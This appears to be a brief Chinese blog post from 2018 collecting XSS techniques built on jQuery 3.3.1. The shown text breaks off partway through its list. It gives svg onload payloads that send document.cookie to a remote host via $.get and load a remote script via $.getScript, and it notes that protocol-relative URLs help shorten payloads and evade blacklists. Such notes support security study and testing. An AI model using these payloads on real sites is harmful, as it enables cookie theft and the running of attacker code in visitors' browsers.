13
2018
12

XSS : 围绕 jQuery Libary 的一些跨站知识点 [补充ing]

当前jQuery版本:v 3.3.1知识点:`//`缺省协议,该协议可以精简payload,或绕过黑名单策略`$.get`方法,发起一个get请求,比如<svg onload="$.get('//127.0.0.1/xss.html',document.cookie)">`$.getScript`方法,远程调用一个js脚本,比如<svg onload="$.getScript('//127.0.0.1/xss.js'